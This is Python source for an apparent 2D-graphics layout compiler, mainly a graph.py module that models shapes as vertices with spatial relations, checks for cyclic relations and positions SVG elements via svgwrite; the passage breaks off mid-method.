v = self.context.variables.find_var_by_tag(tag=id, scope=self.function_call_id).data
shape = v.shape
if len(args_for_check) == 0 or args_for_check[len(args_for_check) - 1][0] != shape:
args_for_check.append([shape, 1])
else:
args_for_check[len(args_for_check) - 1][1] += 1
if v.unreachable:
raise graph.UndeclaredShapeException(id)
args_for_call.append(v)
function_called = Function(name=ctx.IDENTIFIER().getText(), args=args_for_check)
if not self.context.check_call(function_called):
raise FunctionSignatureError(function_called.name)
function_result = self.context.call_function(global_graph=self.func_relations_graph,
name=ctx.IDENTIFIER().getText(), args=args_for_call,
parent_id=self.function_call_id)
return function_result
except Exception as e:
message = f"Line {ctx.start.line}, {type(e).__name__}: {'' if len(e.args) == 0 else e.args[0]}"
exception_type = e.__class__
raise exception_type(message)
```
#### File: Language-for-2D-graphics/twodim_compiler/graph.py
```python
import copy
import logging
import uuid
from collections import OrderedDict
from enum import Enum
from typing import Any, Dict, Tuple
from svgwrite.container import SVG
from svgwrite.shapes import Rect
from exceptions import DisconnectedGraphException, UndeclaredShapeException, UndefinedShapeException, \
    RedundantRelationException, UndefinedRelationException, CyclicRelationsException, UnrelatedShapesException
class Shape(Enum):
SQUARE = 1
CIRCLE = 2
RECT = 3
TRIANGLE = 4
SHAPE = 5
@staticmethod
def from_string(shape_name: str):
if shape_name.lower() == "rect":
return Shape.RECT
elif shape_name.lower() == "square":
return Shape.SQUARE
elif shape_name.lower() == "circle":
return Shape.CIRCLE
elif shape_name.lower() == "triangle":
return Shape.TRIANGLE
elif shape_name.lower() == "shape":
return Shape.SHAPE
else:
raise UndefinedShapeException(f"Specified shape type is not supported: {shape_name}")
class Relation(Enum):
# TODO: [Note for the future] For a relation to be true between a graph G and a vertex V it should be true between V and each vertex of graph G
UNRELATED = 0
LEFT = 1
RIGHT = -1
TOP = 2
BOT = -2
IN = 3
CONTAINED = -3 # Opposite of IN
ON = 4
UNDER = -4
ATLEFT = LEFT * 100 # Meaning: Align the left border of these two shapes
ATRIGHT = RIGHT * 100
ATTOP = TOP * 100
ATBOT = BOT * 100
def __neg__(self):
return Relation(-self.value)
def at(self):
if self.value % 100 == 0:
return self
else:
return Relation(self.value * 100)
@staticmethod
def from_string(relation_name: str):
if relation_name.upper() == "LEFT":
return Relation.LEFT
elif relation_name.upper() == "RIGHT":
return Relation.RIGHT
elif relation_name.upper() == "TOP":
return Relation.TOP
elif relation_name.upper() == "BOT":
return Relation.BOT
elif relation_name.upper() == "IN":
return Relation.IN
elif relation_name.upper() == "CONTAINED":
return Relation.CONTAINED
elif relation_name.upper() == "ON":
return Relation.ON
elif relation_name.upper() == "UNDER":
return Relation.UNDER
elif relation_name.upper() == "ATLEFT":
return Relation.ATLEFT
elif relation_name.upper() == "ATRIGHT":
return Relation.ATRIGHT
elif relation_name.upper() == "ATTOP":
return Relation.ATTOP
elif relation_name.upper() == "ATBOT":
return Relation.ATBOT
else:
raise UndefinedRelationException(f"Relation named \"{relation_name}\" doesn\'t exist")
class Vertex:
def __init__(self, shape: str = 'shape', args: Any = None, content=None, parent_graph=None,
color: Tuple[int, ...] = None):
"""
:param parent_graph: Graph that contains this Vertex
:param shape: Type of this variable
:param args: Arguments passed to the variable initialization in code
:param content: Type should be Graph or None; allows for comparison between graphs and shapes
"""
self.uid = uuid.uuid1() # This will allow editting svg files after calling draw() on parts of the graph; the
# program can reference any shape by its unique ID or at least try to make a unique variable for each unique ID
self.updated = False
self.drawn = False
self.graph = parent_graph # Graph that this shape is a part of
self.LEFT: OrderedDict[Vertex, Any] = OrderedDict()
self.RIGHT: OrderedDict[Vertex, Any] = OrderedDict()
self.TOP: OrderedDict[Vertex, Any] = OrderedDict()
self.BOT: OrderedDict[Vertex, Any] = OrderedDict()
self.ATLEFT: OrderedDict[Vertex, Any] = OrderedDict()
self.ATRIGHT: OrderedDict[Vertex, Any] = OrderedDict()
self.ATTOP: OrderedDict[Vertex, Any] = OrderedDict()
self.ATBOT: OrderedDict[Vertex, Any] = OrderedDict()
self.IN: Vertex = None
self.CONTAINED: OrderedDict[Vertex, Any] = OrderedDict()
self.ON: OrderedDict[Vertex, Any] = OrderedDict()
self.UNDER: OrderedDict[Vertex, Any] = OrderedDict()
self.unreachable = False
self.content = content
if isinstance(shape, Shape):
self.shape = shape
else:
self.shape = Shape.from_string(shape)
# Saving it here to use in functions
self.size_args = copy.copy(args)
# Determine Bounding Box fractional size through passed arguments
self.bb_w = 100.0
self.bb_h = 100.0
if isinstance(args, list) and len(args) > 0:
self.bb_w = float(args.pop(0).replace('%', ''))
# If second dimension was passed use it for height
if len(args) > 0:
self.bb_h = float(args.pop(0).replace('%', ''))
# Adjust Bounding Box fractional size based on shape
self.adjust_size_based_on_shape()
width = self.bb_w
height = self.bb_h
x = 100.0 - self.bb_w
y = 100.0 - self.bb_h
# Use svgwrite features for shape properties
if isinstance(color, tuple) and len(color) > 0:
if len(color) == 3:
self.color = color
elif len(color) > 3:
self.color = tuple(list(color)[:3])
else:
self.color = tuple(list(color) + [0] * (3 - len(color)))
else:
self.color = (0, 0, 0)
if self.shape == Shape.RECT:
self.content = Rect(insert=(f"{x}%", f"{y}%"), size=(f"{width}%", f"{height}%"),
fill="rgb" + str(self.color))
elif self.shape == Shape.SHAPE:
if self.content is None:
self.content = SVG(insert=(f"{x}%", f"{y}%"), size=(f"{width}%", f"{height}%"))
else:
# This is (probably) assignment declaration; constraint the content size but do not create new content
self.width = self.bb_w
self.height = self.bb_h
else:
raise UndefinedShapeException(f"Specified shape type is not supported: {self.shape}")
def __str__(self):
return f"{self.shape} [{self.width_perc}, {self.height_perc}] at: (x={self.x_perc}, y={self.y_perc})"
@property
def neighbours(self) -> OrderedDict:
result = self.LEFT.copy()
for d in (self.RIGHT, self.TOP, self.BOT, self.ATLEFT, self.ATRIGHT, self.ATTOP, self.ATBOT):
result.update(d)
return result
def draw(self, canvas):
"""
Pass drawing responsibility to parent graph;
:param canvas:
:return:
"""
self.graph.draw(canvas, caller_vertex=self)
def adjust_size_based_on_shape(self):
# Adjust Bounding Box fractional size based on shape
if self.shape == Shape.SQUARE or self.shape == Shape.CIRCLE:
self.bb_h = self.bb_w = min(self.bb_h, self.bb_w)
# Getters and setters for SVG element position - you should only be passing and receiving floats from these parameters (instead of strings like "10.5%")
@property
def x_perc(self):
"""
:return: Element's 'x' coordinate in a string formatted like: "10.5%" "25%" etc.
"""
return self.content['x']
@property
def x(self):
return float(self.content['x'].replace("%", ""))
@x.setter
def x(self, val):
self.content['x'] = f"{val}%"
@property
def y_perc(self):
return self.content['y']
@property
def y(self):
return float(self.content['y'].replace("%", ""))
@y.setter
def y(self, val):
self.content['y'] = f"{val}%"
@property
def width_perc(self):
return self.content['width']
@property
def width(self):
return float(self.content['width'].replace("%", ""))
@width.setter
def width(self, val):
self.content['width'] = f"{val}%"
@property
def height_perc(self):
return self.content['height']
@property
def height(self):
return float(self.content['height'].replace("%", ""))
@height.setter
def height(self, val):
self.content['height'] = f"{val}%"
def center_horizontally_if_legal(self):
if len(self.LEFT) == 0 and len(self.RIGHT) == 0 and len(self.ATLEFT) == 0 and len(self.ATRIGHT) == 0:
self.x = (100 - self.width) / 2
def center_vertically_if_legal(self):
if len(self.TOP) == 0 and len(self.BOT) == 0 and len(self.ATTOP) == 0 and len(self.ATBOT) == 0:
self.y = (100 - self.height) / 2
def center_if_legal(self):
self.center_horizontally_if_legal()
self.center_vertically_if_legal()
# HORIZONTAL RELATIONS
def is_left(self, other) -> bool:
return self.x <= other.x - self.width
def is_right(self, other) -> bool:
return self.x >= other.x + other.width
def to_left_of(self, other):
"""
Move this vertex to the left side of other vertex
:param other:
:return:
"""
self.x = other.x - self.width
def to_right_of(self, other):
"""
Move this vertex to the right side of other vertex
:param other:
:return:
"""
self.x = other.x + other.width
# HORIZONTAL "ALIGN/AT" RELATIONS
def is_atleft(self, other) -> bool:
return self.x == other.x
def is_atright(self, other) -> bool:
return self.x + self.width == other.x + other.width
def to_atleft_of(self, other):
self.x = other.x
def to_atright_of(self, other):
self.x = other.x + other.width - self.width
# VERTICAL RELATIONS
def is_top(self, other) -> bool:
return self.y <= other.y - self.height
def is_bot(self, other) -> bool:
return self.y >= other.y + other.height
def to_top_of(self, other):
"""
Move this vertex to the left side of other vertex
:param other:
:return:
"""
self.y = other.y - self.height
def to_bot_of(self, other):
"""
Move this vertex to the right side of other vertex
:param other:
:return:
"""
self.y = other.y + other.height
# VERTICAL "ALIGN/AT" RELATIONS
def is_attop(self, other) -> bool:
return self.y == other.y
def is_atbot(self, other) -> bool:
return self.y + self.height == other.y + other.height
def to_attop_of(self, other):
self.y = other.y
def to_atbot_of(self, other):
self.y = other.y + other.height - self.height
def add_neighbour(self, v, relation: Relation):
# TODO: [Note for the future] This method might not be necessary as querying graph.relation_matrix_XYZ[v1][v2] is quite intuitive BUT every vertex has to be a part of some graph at all times
"""
Adds a new vertex with given relation to this one's neighbours and this one to the new vertex's with an opposite relation
:param v: New vertex neighbour of self
        :param relation: Relation of self to neighbour vertex; read: "self RELATION v", e.g. for relation=Relation.LEFT: "self LEFT v", so "v RIGHT self"
:return:
"""
# Basic 2D relations are antagonistic
if relation == Relation.LEFT:
v.LEFT[self] = None
self.RIGHT[v] = None
elif relation == Relation.RIGHT:
v.RIGHT[self] = None
self.LEFT[v] = None
elif relation == Relation.TOP:
v.TOP[self] = None
self.BOT[v] = None
elif relation == Relation.BOT:
v.BOT[self] = None
self.TOP[v] = None
# AT-xyz relations are mutual (bidirectional)
elif relation == Relation.ATLEFT:
v.ATLEFT[self] = None
self.ATLEFT[v] = None
elif relation == Relation.ATRIGHT:
v.ATRIGHT[self] = None
self.ATRIGHT[v] = None
elif relation == Relation.ATTOP:
v.ATTOP[self] = None
self.ATTOP[v] = None
elif relation == Relation.ATBOT:
v.ATBOT[self] = None
self.ATBOT[v] = None
# TODO: Z-axis relations
elif relation == Relation.IN:
v.IN = self
self.CONTAINED[v] = None
elif relation == Relation.CONTAINED:
v.CONTAINED[self] = None
self.IN = v
elif relation == Relation.ON:
v.ON[self] = None
self.UNDER[v] = None
elif relation == Relation.UNDER:
v.UNDER[self] = None
self.ON[v] = None
else:
raise UndefinedRelationException(str(relation))
def get_neighbours_by_relation(self, r: Relation):
if r == Relation.UNRELATED:
raise UnrelatedShapesException("You tried retrieving all shapes UNRELATED to this one which is an illegal operation")
elif r == Relation.LEFT:
return self.LEFT
elif r == Relation.RIGHT:
return self.RIGHT
elif r == Relation.TOP:
return self.TOP
elif r == Relation.BOT:
return self.BOT
elif r == Relation.ATLEFT:
return self.ATLEFT
elif r == Relation.ATRIGHT:
return self.ATRIGHT
elif r == Relation.ATTOP:
return self.ATTOP
elif r == Relation.ATBOT:
return self.ATBOT
else:
raise UndefinedRelationException(f"Relation denoted by {r} is not defined")
def remove_neighbour(self, neighbour):
"""
WARNING: This function is deprecated (for the time being); don't use it
:param neighbour:
:return:
"""
if neighbour in self.LEFT:
self.LEFT.pop(neighbour)
neighbour.RIGHT.pop(self)
elif neighbour in self.RIGHT:
self.RIGHT.pop(neighbour)
neighbour.LEFT.pop(self)
elif neighbour in self.TOP:
self.TOP.pop(neighbour)
neighbour.BOT.pop(self)
elif neighbour in self.BOT:
self.BOT.pop(neighbour)
neighbour.TOP.pop(self)
elif neighbour == self.IN:
self.IN = None
neighbour.CONTAINED.pop(self)
elif neighbour in self.CONTAINED:
self.CONTAINED.pop(neighbour)
neighbour.IN = None
elif neighbour in self.ON:
self.ON.pop(neighbour)
neighbour.UNDER.pop(self)
elif neighbour in self.UNDER:
self.UNDER.pop(neighbour)
neighbour.ON.pop(self)
class Graph:
def __init__(self, x=0, y=0, width=100, height=100, viewport_size=None):
self.vertices: OrderedDict[Vertex, Any] = OrderedDict() # all unique vertices in a graph
# Position of the top-left corner of this graph's bounding box
self.x = x
self.y = y
# Width and height of this graph's bounding box (width in the widest point and height in the highest point)
self.width = width
self.height = height
# SVG elem that contains this graph's elements
self.svg_elem = SVG(insert=(f"{x}%", f"{y}%"), size=(f"{width}%", f"{height}%"))
self.relation_matrix_horizontal: Dict[
Vertex, Dict[Vertex, Relation]] = OrderedDict() # all horizontal relations in the shape graph
self.relation_matrix_vertical: Dict[
Vertex, Dict[Vertex, Relation]] = OrderedDict() # all vertical relations in the shape graph
@property
def content_width(self):
return 0 if len(self.vertices) == 0 else max(v.x + v.width for v in self.vertices.keys()) - min(
v.x for v in self.vertices.keys())
@property
def content_height(self):
return 0 if len(self.vertices) == 0 else max(v.y + v.height for v in self.vertices.keys()) - min(
v.y for v in self.vertices.keys())
@property
def content_x(self):
return 0 if len(self.vertices) == 0 else min(v.x for v in self.vertices.keys())
@property
def content_y(self):
return 0 if len(self.vertices) == 0 else min(v.y for v in self.vertices.keys())
def add_vertex(self, v: Vertex):
if v not in self.vertices.keys():
# Add relations between this new vertex and other old vertices
self.relation_matrix_horizontal[v] = {other_v: Relation.UNRELATED for other_v in self.vertices.keys()}
self.relation_matrix_vertical[v] = {other_v: Relation.UNRELATED for other_v in self.vertices.keys()}
# Add relations between other old vertices and this new vertex
for key in self.relation_matrix_horizontal.keys():
if key is not v:
self.relation_matrix_horizontal[key][v] = Relation.UNRELATED
for key in self.relation_matrix_vertical.keys():
if key is not v:
self.relation_matrix_vertical[key][v] = Relation.UNRELATED
# Add new vertex to vertices set
self.vertices[v] = None
# Give the vertex a reference to this Graph
v.graph = self
def add_relation(self, v_from: Vertex, v_to: Vertex, r: Relation):
# TODO: A |top B - A jest powyżej od B, przylega do jego górnej krawędzi
# TODO: rect A [10%, EXPAND_TO_FILL] - EXPAND_TO_FILL means 100% - the rest of the shapes
"""
:param v_from:
:param v_to:
:param r:
:raises UndeclaredShapeException
:raises RedundantRelationException
:raises CyclicRelationsException
:return:
"""
# Both shapes should have already been added to this graph before defining relations between them
if v_from is None or v_to is None or v_from not in self.vertices.keys() or v_to not in self.vertices.keys():
logging.info(f"{v_from=} {v_to=}")
raise UndeclaredShapeException(f"{v_from=} {v_to=}")
if v_from is v_to:
raise RedundantRelationException
# Modify relation in respective matrix; note that you need to modify it for both vertices
if r in (Relation.LEFT, Relation.RIGHT, Relation.ATLEFT, Relation.ATRIGHT):
self.relation_matrix_horizontal[v_from][v_to] = r
if r == Relation.LEFT:
# Add this relation to all ATRIGHT neighbours of v_from and opposite to all ATLEFT of v_to
for atr in v_from.ATRIGHT.keys():
self.relation_matrix_horizontal[atr][v_to] = r
self.relation_matrix_horizontal[v_to][atr] = -r
atr.add_neighbour(v_to, r)
for atl in v_to.ATLEFT.keys():
self.relation_matrix_horizontal[atl][v_from] = -r
self.relation_matrix_horizontal[v_from][atl] = r
atl.add_neighbour(v_from, -r)
for atl in v_to.ATLEFT.keys():
                    for atr in v_from.ATRIGHT.keys():
self.relation_matrix_horizontal[atr][atl] = r
self.relation_matrix_horizontal[atl][atr] = -r
atr.add_neighbour(atl, r)
elif r == Relation.RIGHT:
# Add this relation to all ATLEFT neighbours of v_from and opposite to all ATRIGHT of v_to
for atl in v_from.ATLEFT.keys():
self.relation_matrix_horizontal[atl][v_to] = r
self.relation_matrix_horizontal[v_to][atl] = -r
atl.add_neighbour(v_to, r)
for atr in v_to.ATRIGHT.keys():
self.relation_matrix_horizontal[atr][v_from] = -r
self.relation_matrix_horizontal[v_from][atr] = r
atr.add_neighbour(v_from, -r)
for atr in v_to.ATRIGHT.keys():
                    for atl in v_from.ATLEFT.keys():
self.relation_matrix_horizontal[atr][atl] = -r
self.relation_matrix_horizontal[atl][atr] = r
atr.add_neighbour(atl, -r)
elif r == Relation.ATLEFT:
# Snapshot pre-changes sets of neighbours so we don't mutate structures that we work on
atla = v_from.ATLEFT.copy()
atlb = v_to.ATLEFT.copy()
la = v_from.LEFT.copy()
lb = v_to.LEFT.copy()
for atl in atla.keys():
self.relation_matrix_horizontal[atl][v_to] = r
self.relation_matrix_horizontal[v_to][atl] = r
atl.add_neighbour(v_to, r)
for atl in atlb.keys():
self.relation_matrix_horizontal[atl][v_from] = r
self.relation_matrix_horizontal[v_from][atl] = r
atl.add_neighbour(v_from, r)
for aatl in atla.keys():
for batl in atlb.keys():
self.relation_matrix_horizontal[aatl][batl] = r
self.relation_matrix_horizontal[batl][aatl] = r
aatl.add_neighbour(batl, r)
for l in la.keys():
self.relation_matrix_horizontal[l][v_to] = Relation.LEFT
self.relation_matrix_horizontal[v_to][l] = Relation.RIGHT
l.add_neighbour(v_to, Relation.LEFT)
for l in lb.keys():
self.relation_matrix_horizontal[l][v_from] = Relation.LEFT
self.relation_matrix_horizontal[v_from][l] = Relation.RIGHT
l.add_neighbour(v_from, Relation.LEFT)
for al in la.keys():
for bl in lb.keys():
self.relation_matrix_horizontal[al][bl] = (-r).at()
self.relation_matrix_horizontal[bl][al] = (-r).at()
al.add_neighbour(bl, (-r).at())
elif r == Relation.ATRIGHT:
# Snapshot pre-changes sets of neighbours so we don't mutate structures that we work on
atra = v_from.ATRIGHT.copy()
atrb = v_to.ATRIGHT.copy()
ra = v_from.RIGHT.copy()
rb = v_to.RIGHT.copy()
for atr in atra.keys():
self.relation_matrix_horizontal[atr][v_to] = r
self.relation_matrix_horizontal[v_to][atr] = r
atr.add_neighbour(v_to, r)
for atr in atrb.keys():
self.relation_matrix_horizontal[atr][v_from] = r
self.relation_matrix_horizontal[v_from][atr] = r
atr.add_neighbour(v_from, r)
for aatr in atra.keys():
for batr in atrb.keys():
self.relation_matrix_horizontal[aatr][batr] = r
self.relation_matrix_horizontal[batr][aatr] = r
aatr.add_neighbour(batr, r)
for rr in ra.keys():
self.relation_matrix_horizontal[rr][v_to] = Relation.RIGHT
self.relation_matrix_horizontal[v_to][rr] = Relation.LEFT
rr.add_neighbour(v_to, Relation.RIGHT)
for rr in rb.keys():
self.relation_matrix_horizontal[rr][v_from] = Relation.RIGHT
self.relation_matrix_horizontal[v_from][rr] = Relation.LEFT
rr.add_neighbour(v_from, Relation.RIGHT)
for ar in ra.keys():
for br in rb.keys():
self.relation_matrix_horizontal[ar][br] = (-r).at()
self.relation_matrix_horizontal[br][ar] = (-r).at()
ar.add_neighbour(br, (-r).at())
# Inline if is crucial - AT-xyz relations are bidirectional:
# "A ATLEFT B" is the same as "B ATLEFT A"
self.relation_matrix_horizontal[v_to][v_from] = r if r in (Relation.ATLEFT, Relation.ATRIGHT) else -r
if self._invalid_horizontal_relations():
raise CyclicRelationsException(
f"Relation {r=} between {v_from.uid=} and {v_to.uid=} causes a cycle in horizontal relations")
elif r in (Relation.TOP, Relation.BOT, Relation.ATTOP, Relation.ATBOT):
self.relation_matrix_vertical[v_from][v_to] = r
if r == Relation.TOP:
# Add this relation to all ATBOT neighbours of v_from and opposite to all ATTOP of v_to
for atr in v_from.ATBOT.keys():
self.relation_matrix_vertical[atr][v_to] = r
self.relation_matrix_vertical[v_to][atr] = -r
atr.add_neighbour(v_to, r)
for atl in v_to.ATTOP.keys():
self.relation_matrix_vertical[atl][v_from] = -r
self.relation_matrix_vertical[v_from][atl] = r
atl.add_neighbour(v_from, -r)
for atl in v_to.ATTOP.keys():
                    for atr in v_from.ATBOT.keys():
self.relation_matrix_vertical[atr][atl] = r
self.relation_matrix_vertical[atl][atr] = -r
atr.add_neighbour(atl, r)
elif r == Relation.BOT:
# Add this relation to all ATTOP neighbours of v_from and opposite to all ATBOT of v_to
for atl in v_from.ATTOP.keys():
self.relation_matrix_vertical[atl][v_to] = r
self.relation_matrix_vertical[v_to][atl] = -r
atl.add_neighbour(v_to, r)
for atr in v_to.ATBOT.keys():
self.relation_matrix_vertical[atr][v_from] = -r
self.relation_matrix_vertical[v_from][atr] = r
atr.add_neighbour(v_from, -r)
for atr in v_to.ATBOT.keys():
                    for atl in v_from.ATTOP.keys():
self.relation_matrix_vertical[atr][atl] = -r
self.relation_matrix_vertical[atl][atr] = r
atr.add_neighbour(atl, -r)
elif r == Relation.ATTOP:
# Snapshot pre-changes sets of neighbours so we don't mutate structures that we work on
atla = v_from.ATTOP.copy()
atlb = v_to.ATTOP.copy()
la = v_from.TOP.copy()
lb = v_to.TOP.copy()
for atl in atla.keys():
self.relation_matrix_vertical[atl][v_to] = r
self.relation_matrix_vertical[v_to][atl] = r
atl.add_neighbour(v_to, r)
for atl in atlb.keys():
self.relation_matrix_vertical[atl][v_from] = r
self.relation_matrix_vertical[v_from][atl] = r
atl.add_neighbour(v_from, r)
for aatl in atla.keys():
for batl in atlb.keys():
self.relation_matrix_vertical[aatl][batl] = r
self.relation_matrix_vertical[batl][aatl] = r
aatl.add_neighbour(batl, r)
for l in la.keys():
self.relation_matrix_vertical[l][v_to] = Relation.TOP
self.relation_matrix_vertical[v_to][l] = Relation.BOT
l.add_neighbour(v_to, Relation.TOP)
for l in lb.keys():
self.relation_matrix_vertical[l][v_from] = Relation.TOP
self.relation_matrix_vertical[v_from][l] = Relation.BOT
l.add_neighbour(v_from, Relation.TOP)
for al in la.keys():
for bl in lb.keys():
self.relation_matrix_vertical[al][bl] = (-r).at()
self.relation_matrix_vertical[bl][al] = (-r).at()
al.add_neighbour(bl, (-r).at())
elif r == Relation.ATBOT:
# Snapshot pre-changes sets of neighbours so we don't mutate structures that we work on
atra = v_from.ATBOT.copy()
atrb = v_to.ATBOT.copy()
ra = v_from.BOT.copy()
rb = v_to.BOT.copy()
for atr in atra.keys():
self.relation_matrix_vertical[atr][v_to] = r
self.relation_matrix_vertical[v_to][atr] = r
atr.add_neighbour(v_to, r)
for atr in atrb.keys():
self.relation_matrix_vertical[atr][v_from] = r
self.relation_matrix_vertical[v_from][atr] = r
atr.add_neighbour(v_from, r)
for aatr in atra.keys():
for batr in atrb.keys():
self.relation_matrix_vertical[aatr][batr] = r
self.relation_matrix_vertical[batr][aatr] = r
aatr.add_neighbour(batr, r)
for rr in ra.keys():
self.relation_matrix_vertical[rr][v_to] = Relation.BOT
self.relation_matrix_vertical[v_to][rr] = Relation.TOP
rr.add_neighbour(v_to, Relation.BOT)
for rr in rb.keys():
self.relation_matrix_vertical[rr][v_from] = Relation.BOT
self.relation_matrix_vertical[v_from][rr] = Relation.TOP
rr.add_neighbour(v_from, Relation.BOT)
for ar in ra.keys():
for br in rb.keys():
self.relation_matrix_vertical[ar][br] = (-r).at()
self.relation_matrix_vertical[br][ar] = (-r).at()
ar.add_neighbour(br, (-r).at())
# Inline if is crucial - AT-xyz relations are bidirectional:
# "A ATTOP B" is the same as "B ATTOP A"
self.relation_matrix_vertical[v_to][v_from] = r if r in (Relation.ATTOP, Relation.ATBOT) else -r
if self._invalid_vertical_relations():
raise CyclicRelationsException(
f"Relation {r=} between {v_from.uid=} and {v_to.uid=} causes a cycle in vertical relations")
# TODO: Implement incidence matrices for other relations
else:
return
# TODO: [Note for the future] This method might not be necessary as querying graph.relation_matrix_XYZ[v1][v2] is quite intuitive BUT every vertex has to be a part of some graph
# Give vertex info about new neighbour
v_from.add_neighbour(v_to, r)
def _is_cyclic_horizontal_util(self, v: Vertex, visited: Dict[Vertex, bool], rec_stack: Dict[Vertex, bool]) -> bool:
"""
Visit vertex "v" and check if any neighbour was visited previously
:param v: Vertex to check
:param visited: Dictionary of vertices, keys are vertices, values are True if visited
:param rec_stack: Keys are vertices, values are True if scheduled for visit
:return:
"""
# Mark current node as visited and
# adds to recursion stack
visited[v] = True
rec_stack[v] = True
# Recur for all neighbours
# if any neighbour is visited and in
# rec_stack then graph is cyclic
# NOTE: Only check LEFT relation
for neighbour in (neigh for neigh, relation in self.relation_matrix_horizontal[v].items() if
relation == Relation.LEFT):
if not visited[neighbour]:
if self._is_cyclic_horizontal_util(neighbour, visited, rec_stack):
return True
elif rec_stack[neighbour]:
return True
# The node needs to be popped from
# recursion stack before function ends
rec_stack[v] = False
return False
def _invalid_horizontal_relations(self) -> bool:
"""
Check if there is a cycle in the horizontal relations graph
:return: True if horizontal relations graph is cyclic
"""
visited = {v: False for v in self.vertices.keys()}
rec_stack = {v: False for v in self.vertices.keys()}
for node in self.vertices.keys():
if not visited[node]:
if self._is_cyclic_horizontal_util(node, visited, rec_stack):
return True
return False
def _is_cyclic_vertical_util(self, v: Vertex, visited: Dict[Vertex, bool], rec_stack: Dict[Vertex, bool]) -> bool:
"""
Visit vertex "v" and check if any neighbour was visited previously
:param v: Vertex to check
:param visited: Dictionary of vertices, keys are vertices, values are True if visited
:param rec_stack: Keys are vertices, values are True if scheduled for visit
:return:
"""
# Mark current node as visited and
# adds to recursion stack
visited[v] = True
rec_stack[v] = True
# Recur for all neighbours
# if any neighbour is visited and in
# rec_stack then graph is cyclic
# NOTE: Only check TOP relation
for neighbour in (neigh for neigh, relation in self.relation_matrix_vertical[v].items() if
relation == Relation.TOP):
if not visited[neighbour]:
if self._is_cyclic_vertical_util(neighbour, visited, rec_stack):
return True
elif rec_stack[neighbour]:
return True
# The node needs to be popped from
# recursion stack before function ends
rec_stack[v] = False
return False
def _invalid_vertical_relations(self) -> bool:
"""
Check if there is a cycle in the vertical relations graph
:return: True if vertical relations graph is cyclic
"""
visited = {v: False for v in self.vertices.keys()}
rec_stack = {v: False for v in self.vertices.keys()}
for node in self.vertices.keys():
if not visited[node]:
if self._is_cyclic_vertical_util(node, visited, rec_stack):
return True
return False
def print_relations(self, v: Vertex) -> None:
# TODO generate SVG for provided parameters
if v not in self.vertices.keys():
logging.debug("Not in graph")
else:
logging.info(f"Found vertex {v.shape}:{v.uid}")
for v2, relation in self.relation_matrix_horizontal[v].items():
logging.info(f"{v2.shape}:{v2.uid}")
def merge_with(self, other, r: Relation = Relation.UNRELATED):
# TODO: Parameter "r" taken into account (as stated in docstring)
"""
Merge vertices and relations of the other graph into this one
:param r: [optional] Make all self.vertices satisfy relation "r" with all other.vertices
:param other: Other Graph
:return:
"""
# Add all new vertices
for vertex in other.vertices.keys():
self.add_vertex(vertex)
# Add all new relations
for v1, relation_dict in other.relation_matrix_horizontal.items():
for v2, relation in relation_dict.items():
self.add_relation(v1, v2, relation)
# Clear vertex data from other Graph (they are now a part of this one)
other.vertices.clear()
other.relation_matrix_horizontal.clear()
def find_vertex(self, vertex_id: str) -> Vertex:
for vertex in self.vertices.keys():
if str(vertex.uid) == str(vertex_id):
return vertex
raise UndeclaredShapeException(vertex_id)
def remove_vertex(self, v: Vertex):
if v in self.vertices:
# Add relations between this new vertex and other old vertices
self.relation_matrix_horizontal.pop(v)
self.relation_matrix_vertical.pop(v)
# Add relations between other old vertices and this new vertex
for key in self.relation_matrix_horizontal.keys():
if key is not v:
del self.relation_matrix_horizontal[key][v]
for key in self.relation_matrix_vertical.keys():
if key is not v:
del self.relation_matrix_vertical[key][v]
# Remove from vertices list
self.vertices.pop(v)
def sort_horizontal(self):
"""
Make sure all horizontal relations are valid
:return:
"""
for v1, relation_map in self.relation_matrix_horizontal.items():
for v2, relation in relation_map.items():
v2_was_leftmost = self.x == v2.x
v2_was_rightmost = self.x + self.width == v2.x + v2.width
# ALWAYS MOVE THE OTHER VERTEX
if relation is Relation.LEFT and not v1.is_left(v2):
v2.to_right_of(v1)
elif relation is Relation.RIGHT and not v1.is_right(v2):
v2.to_left_of(v1)
elif relation is Relation.ATLEFT and not v1.is_atleft(v2):
v2.to_atleft_of(v1)
elif relation is Relation.ATRIGHT and not v1.is_atright(v2):
v2.to_atright_of(v1)
# # UPDATE GRAPH BOUNDING BOX VALUES
# self._update_horizontal()
def sort_vertical(self):
"""
Make sure all vertical relations are valid
:return:
"""
for v1, relation_map in self.relation_matrix_vertical.items():
for v2, relation in relation_map.items():
v2_was_topmost = self.y == v2.y
v2_was_botmost = self.y + self.height == v2.y + v2.height
# ALWAYS MOVE THE OTHER VERTEX
if relation is Relation.TOP and not v1.is_top(v2):
v2.to_bot_of(v1)
elif relation is Relation.BOT and not v1.is_bot(v2):
v2.to_top_of(v1)
elif relation is Relation.ATTOP and not v1.is_attop(v2):
v2.to_attop_of(v1)
elif relation is Relation.ATBOT and not v1.is_atbot(v2):
v2.to_atbot_of(v1)
#
# # UPDATE GRAPH BOUNDING BOX VALUES
# self._update_vertical()
# self._update_horizontal()
def _update_x(self):
self.x = min(v.x for v in self.vertices.keys())
def _update_y(self):
self.y = min(v.y for v in self.vertices.keys())
def _update_horizontal(self):
self._update_x()
self.width = max(v.x + v.width for v in self.vertices.keys()) - self.x
def _update_vertical(self):
self._update_y()
self.height = max(v.y + v.height for v in self.vertices.keys()) - self.y
def update_position_and_size(self):
"""
Recalculate graph's X, Y, width and height based on its vertices
:return:
"""
self._update_horizontal()
self._update_vertical()
def content_move_horizontal(self, dist: int, parent_width=1):
"""
Shift all shapes by the given distance in the X axis.
:param dist: Positive integer to move right, negative to move left
:return:
"""
for v in self.vertices.keys():
v.x += dist
self.x += dist
def content_move_vertical(self, dist: int):
"""
Shift all shapes by the given distance in the Y axis.
:param dist: Positive integer to move down, negative to move up
:return:
"""
for v in self.vertices.keys():
v.y += dist
self.y += dist
def center(self, pw=100, ph=100, px: int = 0, py: int = 0):
"""
Center this graph in given parent dimensions
:param pw: Parent width
:param ph: Parent height
:param px: Parent X; 0 for viewport
:param py: Parent Y; 0 for viewport
:return:
"""
target_x = (100 - self.width) / 2
target_y = (100 - self.height) / 2
self.x = target_x
self.y = target_y
def content_center_in_self(self):
target_x = (100 - self.content_width) / 2
target_y = (100 - self.content_height) / 2
if self.content_x != target_x:
self.content_move_to(target_x, self.content_y)
if self.content_y != target_y:
self.content_move_to(self.content_x, target_y)
def content_move_to(self, x, y):
self.content_move_horizontal(x - self.content_x)
self.content_move_vertical(y - self.content_y)
def replace_vertex(self, vertex_to_replace: Vertex, new_vertex: Vertex):
self._copy_contents(vertex_to_replace, new_vertex)
self.add_vertex(new_vertex)
for v_from in self.relation_matrix_horizontal.keys():
if v_from != new_vertex and v_from in self.vertices.keys():
